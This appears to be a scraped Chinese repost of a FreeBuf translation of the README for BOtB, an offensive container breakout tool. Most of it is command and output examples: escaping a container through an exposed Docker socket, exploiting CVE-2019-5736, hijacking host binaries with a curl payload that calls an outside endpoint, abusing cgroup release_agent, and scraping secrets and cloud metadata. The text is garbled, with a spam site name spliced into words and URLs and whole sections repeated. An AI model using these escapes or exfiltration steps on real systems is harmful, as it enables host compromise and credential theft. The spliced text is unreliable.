登陆

极彩登陆-Botb:容器剖析和缝隙使用东西

admin 2019-11-10 167人围观 ,发现0个评论

BOtB(Break out the Box)是一款容器剖析和缝隙运用东西,其主要是为浸透测验人员和工程师所规划的。

它可认为咱们做什么?

BOtB是一个CLI东西,你能够履行以下操作:

运用常见的容器缝隙

履行常见的容器后期运用操作

当某些东西或二进制文件在容器中不行用时供给功用

运用BOtB的功用与CI/CD技能来测验容器布置

以手动或主动办法履行以上操作

运用常见的容器缝隙

履行常见的容器后期运用操作

当某些东西或二进制文件在容器中不行用时供给功用

运用BOtB的功用与CI/CD技能来测验容器布置

以手动或主动办法履行以上操作

查找和辨认UNIX域套接字

辨认支撑HTTP的UNIX域套接字

在UNIX域套接字或接口上查找并标识Docker Daemon

剖析和辨认ENV和在ProcFS中(例如/Proc/{极彩登陆-Botb:容器剖析和缝隙使用东西pid}/Environ)进程的灵敏字符串

辨认元数据服务端点,即http://169.254.169.254

经过露出的Docker Daemon履行容器打破

经过CVE-2019-5736履行容器打破

运用自定义payload绑架主机二进制文件

以CI/CD办法履行操作,仅回来> 0退出代码

从GCP元数据端点中抓取元数据信息

将数据推送到s3 bucket

打破特权容器

强制BOtB一直回来Exit代码0(对非堵塞CI/CD有用)

从CLI参数或从YAML装备文件履行以上操作

查找和辨认UNIX域套接字

辨认支撑HTTP的UNIX域套接字

在UNIX域套接字或接口上查找并标识Docker Daemon

剖析和辨认ENV和在ProcFS中(例如/Proc/{pid}/Environ)进程的灵敏字符串

辨认元数据服务端点,即http://169.254.169.254

经过露出的Docker Daemon履行容器打破

经过CVE-2019-5736履行容器打破

运用自定义payload绑架主机二进制文件

以CI/CD办法履行操作,仅回来> 0退出代码

从GCP元数据端点中抓取元数据信息

将数据推送到s3 bucket

打破特权容器

强制BOtB一直回来Exit代码0(对非堵塞CI/CD有用)

从CLI参数或从YAML装备文件履行以上操作

BOtB在发行版中以二进制办法供给。

构建 BOtB

BOtB是用GO编写的,因而你能够运用规范的GO东西来构建。你能够履行以下操作:

获取代码:

go get github.com/brompwnie/botb or git clone git@github.com:brompwnie/botb.git

构建代码:

govendor init govendor add github.com/tv42/httpunix govendor add github.com/kr/pty go build -o botbsBinary 运用

能够将BOTB编译为方针渠道的二进制文件,支撑的用法如下:‘

Usage of ./botb: -aggr string 袁明被打Attempt to exploit RuncPWN (default "nil") -always-succeed Always set BOtB's Exit code to Zero -autopwn Attempt to autopwn exposed sockets -cicd Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0 -config string Load config from provided yaml file (default "nil") -endpointlist string Provide a textfile with endpoints to test (default "nil") -find-docker Attempt to find Dockerd -find-http Hunt for Available UNIX Domain Sockets with HTTP -find-sockets Hunt for Available UNIX Domain Sockets -hijack string Attempt to hijack binaries on host (default "nil") -metadata Attempt to find metadata services -path string Path to Start Scanning for UNIX Domain Sockets (default "/") -pwn-privileged string Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil") -recon Perform Recon of the Container ENV -region string Provide a AWS Region e.g eu-west-2 (default "nil") -s3bucket string Provide a bucket name for S3 Push (default "nil") -s3push string Push a file to S3 e.g Full command to push to htt极彩登陆-Botb:容器剖析和缝隙使用东西ps://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil") -scrape-gcp Attempt to scrape the GCP metadata service -verbose Verbose output -wordlist string Provide a wordlist (default "nil")

还能够指示BOtb经过config参数从YAML文件加载设置

# ./botb -config=cfg.yml [+] Break Out The Box [+] Loading Config: cfg.yml ...

以下用法示例在检测到反常时默许情况下将回来退出代码> 0,这由“echo $?”表明。 显现最终履行指令的退出代码。

查找 UNIX 域套接字

#./bob_linux_amd64 -socket=true [+] Break Out The Box [+] Hunting Down UNIX Domain Sockets from: / [!] Valid Socket: /var/meh [+] Finished #echo $? 1

查找 Docker Daemon

#./bob_linux_amd64 -find-docker=true [+] Break Out The Box [+] Looking for Dockerd [!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375 [+] Hunting Docker Socks [!] Valid Docker Socket: /var/meh [+] Finished #echo $? 1

经过露出的 Docker Daemon 打破容器

这种办法将在主机上打破为交互式TTY。

#./bob_linux_amd64 -autopwn=true [+] Break Out The Box [+] Attempting to autopwn [+] Hunting Docker Socks [+] Attempting to autopwn: /var/meh [+] Attempting to escape to host... [+] Attempting in TTY Mode ./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh chroot /host && clear echo 'You are now on the underlying host' You are now on the underlying host / #

以 CI/CD 友爱办法打破容器

这种办法不会逃逸到主机上的TTY中,而是回来退出代码> 0来指示容器成功打破。

#./bob_linux_amd64 -autopwn=true -cicd=true [+] Break Out The Box [+] Attempting to autopwn [+] Hunting Docker Socks [+] Attempting to autopwn: /var/meh [+] Attempting to escape to host... [!] Succes极彩登陆-Botb:容器剖析和缝隙使用东西sfully escaped container [+] Finished #echo $? 1

运用自定义 payload 运用 CVE-2019-5736

请注意,在该场景下要想有用运用,必须在方针容器中履行一个进程。

#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1' [+] Break Out The Box[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE 极彩登陆-Botb:容器剖析和缝隙使用东西CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ... [+] Attempting to exploit CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$ 1&param2=$2">/dev/null 2>&1 [+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped [+] Finished

运用自定义 payload 在主机上绑架指令/二进制文件

请注意,这可用于测验外部实体是否正在容器内履行指令。例如Docker Exec和Kubetcl CP。

#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$ 1&param2=$2">/dev/null 2>&1' [+] Break Out The Box [!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ... [+] Attempting to hijack binaries [*] Command to be used: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1 [+] Currently hijacking: /bin [+] Currently hijacking: /sbin [+] Currently hijacking: /usr/bin [+] Finished

剖析 ENV 和 ProcFS 环境中的灵敏字符串

默许情况下,BOtB将查找“secret”和“password”。

./bob_linux_amd64 -recon=true [+] Break Out The Box [+] Performing Container Recon [+] Searching /proc/* for data [!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root' [!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin' [!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4' [!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4' [+] Checking ENV Variables for secrets [!] Sensitive Keyword found in ENV: foo=secretpassword [+] Finished #echo $? 1

能够将wordlist供给给BOtB以扫描特定的关键字。

#cat wordlist.txt moo # ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt [+] Break Out The Box [+] Performing Container Recon [+] Searching /proc/* for data [*] Loading entries from: wordlist.txt [+] Checking ENV Variables for secrets [*] Loading entries from: wordlist.txt [+] Finished # echo $? 0

扫描元数据端点

默许情况下,BOtB扫描两个元数据端点。

# ./bob_linux_amd64 -metadata=true [+] Break Out The Box [*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/' [*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/' [+] Finished # echo $? 0

还能够供给需求扫描的端点列表。

# cat endpoints.txt https://heroku.com # ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt [+] Break Out The Box [*] Loading entries from: endpoints.txt [*] Attempting to query metadata endpoint: 'https://heroku.com' [!] Reponse from 'https://heroku.com' -> 200 [+] Finished # echo $? 1

获取接口和 IP

# ./bob_linux_amd64 -interfaces=true [+] Break Out The Box [+] Attempting to get local network interfaces [*] Got Interface: lo [*] Got address: 127.0.0.1/8 [*] Got Interface: tunl0 [*] Got Interface: ip6tnl0 [*] Got Interface: eth0 [*] Got address: 172.17.0.3/16 [+] Finished

扫描呼应 HTTP 的 UNIX 域套接字

# ./bob_linux_amd64 -find-http=true [+] Break Out The Box [+] Looking for HTTP enabled Sockets [!] Valid HTTP Socket: /var/run/docker.sock [+] Finished

从 GCP 元数据实例中抓取数据

# ./botb_linux_amd64 -scrape-gcp=true [+] Break Out The Box [+] Attempting to connect to: 169.254.169.254:80 [*] Output-> HTTP/1.0 200 OK Metadata-Flavor: Google Content-Type: application/text Date: Sun, 30 Jun 2019 21:53:41 GMT Server: Metadata Server for VM Connection: Close Content-Length: 21013 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN 0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0 0.1/meta-data/attached-disks/disks/0/index 0 0.1/meta-data/attached-disks/disks/0/mode READ_WRITE .....

将数据推送到 AWS S3 Bucket

# ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2 [+] Break Out The Box [+] Pushing fileToPush.tar.gz -> nameOfS3Bucket [*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz [+] Finishedtu'po

打破特权容器

# ./bob_linux_amd64 -pwn-privileged=hostname [+] Break Out The Box [+] Attempting to exploit CGROUP Privileges [*] The result of your command can be found in /output [+] Finished root@418fa238e34d:/app# cat /output docker-desktop

强制 botb 一直成功,退出代码为 0

这关于非堵塞CI/CD测验很有用

# ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed-true [+] Break Out The Box [+] Attempting to exploit CGROUP Privileges [*] The result of your command can be found in /output [+] Finished # echo $? 0

将 BOtB 与 YAML 装备文件一同运用

示例YAML文件cfg.yml

payload: id verbose: false always-succeed: true cicd: false endpointlist: endpoints.txt wordlist: wordlist.txt path: / mode: find-sockets

运用以上YAML运转BOtB

# ./bob_linux_amd64 -config=cfg.yml [+] Break Out The Box [+] Loading Config: cfg.yml [+] Looking for UNIX Domain Sockets from: / [!] Valid Socket: /tmp/thisisnotasocket.mock [+] Finished 将 BOtB 与 CI\CD 一同运用

BOtB能够与CI\CD技能一同运用,其运用退出代码来确认测验是否现已经过或失利。以下是履行两个BOtB测验的Shell脚本,这两个测验的退出代码用于设置Shell脚本的退出。假如两个测验中的任何一个回来的退出代码>0,则履行shell脚本的测验将失利。

#!/bin/sh exitCode=0 echo "[+] Testing UNIX Sockets" ./bob_linux_amd64 -autopwn -cicd=true exitCode=$? echo "[+] Testing Env" ./bob_linux_amd64 -recon=true exitCode=$? (exit $exitCode)

以上脚本并不是将BOtB与CI\CD技能一同运用的仅有办法,也能够不包装在shell脚本中独自运用。一个示例YML装备如下:

version: 2 cicd: runATest: ./bob_linux_amd64 -autopwn -cicd=true

以下是可与Heroku CI一同运用的示例装备:

{ "environments": { "test": { "s": { "test": "./bob_linux_amd64 -autopwn -cicd=true" } } } }

以下是Heroku CI的示例装备,但运用了wrapper shell脚本:

{ "environments": { "test": { "s": { "test": "./bin/testSocksAndEnv.sh" } } } } 问题,过错和改善

假如你有任何疑问及改善主张,都能够经过提交issue来告知咱们。

参阅文献与资源

假如没有社区中其他人的奉献,那么也就不会有这款东西,以下是对我有协助的资源列表。

https://docs.docker.com/engine/security/https/

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp

https://docs.docker.com/engine/reference/commandline/exec/

https://github.com/GoogleContainerTools/container-structure-test

https://github.com/coreos/clair

https://github.com/aquasecurity/docker-bench

https://www.cisecurity.org/benchmark/docker/

https://github.com/Frichetten/CVE-2019-5736-PoC

https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/

https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html

https://github.com/wagoodman/dive

https://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf

https://github.com/singe/container-breakouts

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/

https://docs.docker.com/engine/security/https/

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp

https://docs.docker.com/engine/reference/commandline/exec/

https://github.com/GoogleContainerTools/container-structure-test

https://github.com/coreos/clair

https://github.com/aquasecurity/docker-bench

https://www.cisecurity.org/benchmark/docker/

https://github.com/Frichetten/CVE-2019-5736-PoC

https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/

https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html

https://github.com/wagoodman/dive

https://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf

https://github.com/singe/container-breakouts

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/

*参阅来历:GitHub,FB小编secist编译,转载请注明来自FreeBuf.COM

请关注微信公众号
微信二维码
不容错过
Powered By Z-BlogPHP